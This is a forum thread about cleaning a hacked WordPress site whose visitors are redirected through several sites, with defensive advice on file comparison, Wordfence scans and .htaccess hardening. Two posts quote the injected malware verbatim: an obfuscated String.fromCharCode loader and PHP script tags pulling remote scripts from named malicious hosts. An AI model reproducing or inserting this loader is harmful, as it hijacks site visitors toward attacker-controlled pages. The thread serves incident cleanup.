Wordpress site hacked on ISPConfig 3 server and automatically redirects to another site

Discussion in 'General' started by onastvar, May 2, 2020.

  1. onastvar

    onastvar Member

    Thanks @nhybgtvfr I will try your suggestion
     
  2. Steini86

    Steini86 Active Member

    If this string is not in the files (did you have a look in the hidden .htaccess files?) and not in the database, but your browser is still forwarding in a fresh private mode, then there is some other caching going on (maybe on the server). Try restarting php-fpm and apache/nginx.
     
    onastvar likes this.
  3. onastvar

    onastvar Member

    Thanks again @Steini86!
    .htaccess file looks normal, compared with one from another website. I restarted php-fpm and apache, tried private mode, still same issue (redirects).
     
  4. nhybgtvfr

    nhybgtvfr Well-Known Member HowtoForge Supporter

    don't rely on just searching for the string 'stivenfernando'
    although you should search for that as well, you need to search for it in EVERY file; as I said before, it could be in any file, even something that looks like an image file.

    that's why you also need to search for strings like 'eval' 'base64' 'decode', because the whole redirect url could be broken up and hidden across multiple files as little bits of gibberish; it's only when all those bits are combined and decoded that you get something readable.

    you'd need to look at each one you find manually and work out, based on what file it's in, where in the file it is, what the rest of the file is like, what the other files around it are for, etc., whether in context it's likely to be a legitimately encoded bit of script/variable or something malicious.

    it's also possible that the searched-for string no longer even exists on your site; there could be a different string that takes you to another site completely, that rapidly redirects you through a sequence of other sites to the ultimate destination site, just to make it a real bugger to work out what you actually need to look out for.
     
  5. onastvar

    onastvar Member

    Yes, after I enter mydomain.com I can see 5 switches/redirects of URLs until the final site is reached.
     
  6. onastvar

    onastvar Member

    I just found the following inside the theme javascript folder:
    /web/wp-content/themes/enfold/js/avia.js
    /web/wp-content/themes/enfold/js/shortcodes.js
    var hjt689ig9 = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript';
    var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,97,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61,52,52,52); s.src=pl;
    if (document.currentScript) {
    document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
    d.getElementsByTagName('head')[0].appendChild(s);
    var list = document.getElementsByTagName('script');list.insertBefore(s, list.childNodes[0]);
    }var gfhfghfhfgj = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript';
    var pl = String.fromCharCode(104,116,116,112,115,58,47,47,119,115,46,115,116,105,118,101,110,102,101,114,110,97,110,100,111,46,99,111,109,47,115,116,109,63,118,61,50,46,48,46,48); s.src=pl;
    if (document.currentScript) {
    document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
    d.getElementsByTagName('head')[0].appendChild(s);
    var list = document.getElementsByTagName('script');list.insertBefore(s, list.childNodes[0]);
    }

    After I deleted it, mydomain.com now redirects to only 1 URL (it used to be 5):
    https://joinsilverclubbb.com/?p=mvstqmjwmy5gi3bpgeztmoa&sub2=boling5

    Is it safe to replace all javascript files with fresh ones?
     
    Last edited: May 4, 2020
  7. onastvar

    onastvar Member

    I tried to decode the above and it shows the URL
    https://stat.trackstatisticsss.com/j.js?v=444
    which is what I see after I enter mydomain.com.

    So I have to clean all of the files with the malicious code from the previous post.
    Also, when I grep "String.fromCharCode" I get a lot of files (there are too many and it's unreadable).
    Any other advice on how to clean up the malicious code?
     

  8. nhybgtvfr

    nhybgtvfr Well-Known Member HowtoForge Supporter

    to make it a bit easier, for any themes/plugins that you think are infected, download the plugin as a zip file from the source, i.e. wordpress.org, or from the developer's website or market site, envato/codecanyon/themeforest etc.
    you can then unzip the folder elsewhere and compare the files.
    you should do this if you think there are customisations in there that the designer made.
    otherwise just delete the plugin/theme folder and upload the new one, don't delete it from within wordpress or you might lose all the configuration.

    if there are any wordpress files you're not sure about, you can do the same: download the same version of wordpress and extract that to compare them.


    welcome to the wonderful world of cleaning up after clients who don't keep their wordpress installs up-to-date. :rolleyes:
     
    onastvar likes this.
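    One way to do the comparison described above, as an added example that is not part of the thread: hash every file in the fresh download and in the installed copy, then list files whose contents differ, files that exist only in the installed copy, and files missing from it. The directory names in IGNORE_DIRS are an assumption; adjust them to the theme or plugin being checked.

```python
import hashlib
import os
import sys

# Directories that legitimately differ between two copies and only add noise (assumed)
IGNORE_DIRS = {".git", "cache"}

def hash_tree(root):
    """Map relative path -> sha256 hex digest for every file under root."""
    manifest = {}
    for dirpath, dirnames, names in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in IGNORE_DIRS]
        for name in names:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                manifest[os.path.relpath(path, root)] = hashlib.sha256(fh.read()).hexdigest()
    return manifest

def diff_manifests(clean, installed):
    """Classify the installed copy against the clean one (both are path -> digest maps).

    modified: in both, contents differ (injected code, or a real customisation)
    added:    only in the installed copy (dropped files, or custom files)
    missing:  only in the clean copy (deleted, or the download is a newer release)
    Every 'modified' and 'added' entry is something to inspect before trusting it.
    """
    return {
        "modified": sorted(p for p in clean if p in installed and clean[p] != installed[p]),
        "added": sorted(set(installed) - set(clean)),
        "missing": sorted(set(clean) - set(installed)),
    }

def compare_trees(clean_root, installed_root):
    """clean_root is the unzipped fresh download, installed_root the live theme/plugin folder."""
    return diff_manifests(hash_tree(clean_root), hash_tree(installed_root))

if __name__ == "__main__":
    # usage: compare.py <unzipped-fresh-download> <installed-plugin-or-theme-folder>
    for kind, paths in compare_trees(sys.argv[1], sys.argv[2]).items():
        for p in paths:
            print(f"{kind}: {p}")
```

    Anything reported as modified or added in an installed theme or plugin is what to open and read; a fresh upload of the clean copy then replaces the rest without touching the database.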
  9. Jesse Norell

    Jesse Norell Well-Known Member Staff Member Howtoforge Staff

    A quick thing you could try which may or may not help is to set up a clean wordpress site (eg. on another domain/subdomain/somewhere) with wordfence installed, then copy all the /web files from this site to a subdirectory under the other site and run a scan. I think (not 100% positive) it is able to identify multiple wordpress installs in subdirectories like that, and as such I'd guess (complete guess!) it could scan and attempt to fix that installation as well. Wordfence will clean up a lot of the injected scripts and lets you compare/replace files with the originals for core and known themes/plugins. I'd be very surprised if they also read wp-config.php and tried to clean up the database from the other install, but who knows, maybe you'd get lucky.
     
    onastvar likes this.
  10. onastvar

    onastvar Member

    @Jesse Norell Thank You. I was able to install a new wordpress in a subfolder, installed wordfence, and moved the hacked wordpress site to an "infected" subfolder. Wordfence scanned & found the following malicious code in 900+ files.

    Couple of questions:
    1) What core Wordpress files can I replace without losing data/settings?
    2) Is there a command I can use to remove malicious code from 900+ files?


    *.js files have the following malicious code:
    var hjt689ig9 = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript';
    var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,97,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61,52,52,52); s.src=pl;
    if (document.currentScript) {
    document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
    d.getElementsByTagName('head')[0].appendChild(s);
    var list = document.getElementsByTagName('script');list.insertBefore(s, list.childNodes[0]);
    }var gfhfghfhfgj = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript';
    var pl = String.fromCharCode(104,116,116,112,115,58,47,47,119,115,46,115,116,105,118,101,110,102,101,114,110,97,110,100,111,46,99,111,109,47,115,116,109,63,118,61,50,46,48,46,48); s.src=pl;
    if (document.currentScript) {
    document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
    d.getElementsByTagName('head')[0].appendChild(s);
    var list = document.getElementsByTagName('script');list.insertBefore(s, list.childNodes[0]);
    }

    *.php files have the following malicious code:

    <script type='text/javascript' src='https://stat.trackstatisticsss.com/k.js?v=333'></script><script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>
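    A report-only scanner for the two injection shapes quoted in this post and decoded in post 7, added here as an example (not from the thread or from Wordfence): it decodes every String.fromCharCode(...) array found in a file, flags those that resolve to a URL, and flags <script src> tags pointing at the two hosts named above. The host list and the file extensions are assumptions to extend with whatever your own search turns up; nothing is modified, so each hit can be reviewed in context as nhybgtvfr advises.

```python
import os
import re
import sys

# The obfuscated loader seen in the thread, e.g. String.fromCharCode(104,116,...), and <script src=> tags
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
SCRIPT_TAG = re.compile(r"<script[^>]*\bsrc=['\"]([^'\"]+)['\"][^>]*>\s*</script>", re.I)
# Hosts quoted in this thread (assumed list; extend with whatever your own scan surfaces)
KNOWN_BAD_HOSTS = {"stat.trackstatisticsss.com", "ws.stivenfernando.com"}
SCAN_EXT = {".js", ".php", ".html", ".htm"}

def decode_fromcharcode(text):
    """Decode every String.fromCharCode(...) numeric argument list found in text."""
    out = []
    for m in FROMCHARCODE.finditer(text):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        out.append("".join(chr(c) for c in codes))
    return out

def find_injections(text):
    """Return (kind, value) findings for one file's contents; a decoded URL is a loader."""
    findings = []
    for decoded in decode_fromcharcode(text):
        if decoded.startswith(("http://", "https://", "//")):
            findings.append(("fromCharCode-url", decoded))
    for m in SCRIPT_TAG.finditer(text):
        src = m.group(1)
        host = re.sub(r"^(?:https?:)?//", "", src).split("/")[0].lower()
        if host in KNOWN_BAD_HOSTS:
            findings.append(("script-src", src))
    return findings

def scan_tree(root):
    """Walk root; map relative path -> findings for every file that has any."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if os.path.splitext(name)[1].lower() not in SCAN_EXT:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_injections(fh.read())
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report

if __name__ == "__main__":
    # usage: scan.py <web-root>   (defaults to the current directory)
    for rel, hits in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        for kind, value in hits:
            print(f"{rel}: {kind} {value}")
```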
     
  11. onastvar

    onastvar Member

    Thanks again!

    I can replace files, I just wanna make sure I don't lose any settings or data (the bookly plugin on this site has 3 years of data, appts, customers, etc.).

    What's your suggestion?
     
  12. nhybgtvfr

    nhybgtvfr Well-Known Member HowtoForge Supporter

    you shouldn't lose any settings. they should all be in the database.
    some plugins have a habit of having full filepaths embedded in them, but that should be easy to find; they'll end up throwing up errors in /log/error.log about not being able to find some file/function.
    you can always just copy your whole site to the /private folder as a backup, and then just replace all the files as necessary.
    if you do lose any settings/functionality, you can still check the backup copy for any file changes or missing files.
     
  13. Jesse Norell

    Jesse Norell Well-Known Member Staff Member Howtoforge Staff

    To rephrase @nhybgtvfr's answer, "all of them".

    Wordfence can generally do that, is there a "fix" button in the scan results?

    Note that wordfence does a wonderful job of finding known files which have been modified (i.e. the 900+ you have) - it will also attempt to find bad stuff in other ("unknown") files, and this doesn't work nearly as well, for obvious reasons. Most hacked sites have numerous compromises, and in my experience you'll probably still have some things that wordfence doesn't catch which you'll need to find and clean up manually.
     
  14. onastvar

    onastvar Member

    Wordfence does not give me FIX button option. I'll probably have to manually replace INFECTED / all files.
     
  15. Jesse Norell

    Jesse Norell Well-Known Member Staff Member Howtoforge Staff

    Just checking, it's actually "REPAIR" (with the magic wand icon), but it's possible it only does that for files in a default location which it can replace with the original. It was worth a try...
     
    onastvar likes this.
  16. nhybgtvfr

    nhybgtvfr Well-Known Member HowtoForge Supporter

    onastvar and Th0m like this.
  17. Jesse Norell

    Jesse Norell Well-Known Member Staff Member Howtoforge Staff

    onastvar likes this.
  18. onastvar

    onastvar Member

    Thanks everyone for all of the advice.
    I was able to restore/fix the hacked wordpress website using the following steps:

    1) I installed a new Wordpress website in a subfolder NEW of the main INFECTED website (mydomain.com/new/)
    1a) Modified .htaccess to use subfolder NEW

    ##<IfModule mod_rewrite.c>
    ## RewriteEngine On
    ## RewriteCond %{HTTP_HOST} ^mydomain.com$ [OR]
    ## RewriteCond %{HTTP_HOST} ^mydomain.com$
    ## RewriteRule (.*)$ https://mydomain.com/new/$1 [R=301,L]
    ##</IfModule>

    2) Installed (5) original Plugins I had
    4) Installed Wordfence plugin
    5) Adjusted setting in Wordfence plugin to scan subfolders
    6) Copied all of the website files of HACKED website into subfolder (mydomain.com/new/infected)
    7) Wordfence 1st scan found 984 php & js malicious files in folder (mydomain.com/new/infected)
    8) Replaced entire folders (wp-admin & wp-includes) from original wordpress download to (mydomain.com/new/infected)
    9) Wordfence 2nd scan found 528 php & js malicious files (mydomain.com/new/infected)
    10) Replaced subfolders & files of (mydomain.com/new/infected/wp-content/themes & mydomain.com/new/infected/wp-content/plugins)
    11) Wordfence 3rd scan found 29 php & js malicious files (mydomain.com/new/infected)
    12) Replaced subfolders & files of (mydomain.com/new/infected/wp-content/uploads & mydomain.com/new/infected/index.php)
    13) Wordfence 4th scan found 0 php & js malicious files (mydomain.com/new/infected)
    14) Moved all the files from (mydomain.com/new/infected) to (mydomain.com/)
    15) Installed Wordfence plugin, scanned one more time, no issues.

    I was lucky DB was not hacked, all the settings, data, etc were intact.

    Probably a lot of extra steps, but I wanted to be on the safe side and did not want to lose any data.
    I hope this helps someone.
     
  19. nhybgtvfr

    nhybgtvfr Well-Known Member HowtoForge Supporter

    there were quite a lot of additional steps in that.

    all you really needed to do was install a fresh clean wordpress in the subfolder and change .htaccess as you did.
    install the same theme, and plugins as on your original site (fresh downloads from wordpress/developers sites)
    install and configure wordfence.
    do a full scan of this new site in wordfence to confirm it's all clean.

    then all you should need to worry about is the contents of the database and the wp-content folder, and even then, you should be able to ignore most of wp-content.
    plugins you've already sorted; mu-plugins should also be sorted if it existed and you've already re-installed those plugins fresh on the new install. the upgrade and cache folders can be ignored. really the only folder in the original site you should need to copy over to the new install is uploads. do that, scan it, clean it. then it's just the db to scan/clean.

    you should check the original wp-config.php and .htaccess files for any custom settings, db prefixes etc you want to keep, and recreate those in the new install. change the password for the original db. then delete all of the old site, and copy the new install into the parent folder.


    there's other things you can do to make it more secure, e.g. move wp-config.php into /private and give it a random filename so its function isn't obvious. create a new wp-config.php in /web, containing:
    Code:
    <?php
    // /web and /private are sibling folders under the ISPConfig site directory
    include __DIR__ . '/../private/<randomfilename>';
    ?>
    
    you can add this to your .htaccess
    Code:
    <files wp-config.php>
    order allow,deny
    deny from all
    </files>
    <files ~ "^.*\.([Hh][Tt][Aa])">
    order allow,deny
    deny from all
    satisfy all
    </files>
    
    # Block WordPress xmlrpc.php requests
    <Files xmlrpc.php>
    order deny,allow
    deny from all
    </Files>
    # Block wp-includes folder and files
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^wp-admin/includes/ - [F,L]
    RewriteRule !^wp-includes/ - [S=3]
    RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
    RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
    RewriteRule ^wp-includes/theme-compat/ - [F,L]
    </IfModule>
    # BEGIN block author scans
    RewriteEngine On
    RewriteBase /
    RewriteCond %{QUERY_STRING} (author=\d+) [NC]
    RewriteRule .* - [F]
    # END block author scans
    
    you can also put this in .htaccess in uploads
    Code:
    <Files *.php>
    deny from all
    </Files>
    
    you can include .js files etc, if you think someone may be uploading and running them there.

    you could also try 'Options -ExecCGI' but that could stop some things that you want working.
     
    onastvar likes this.
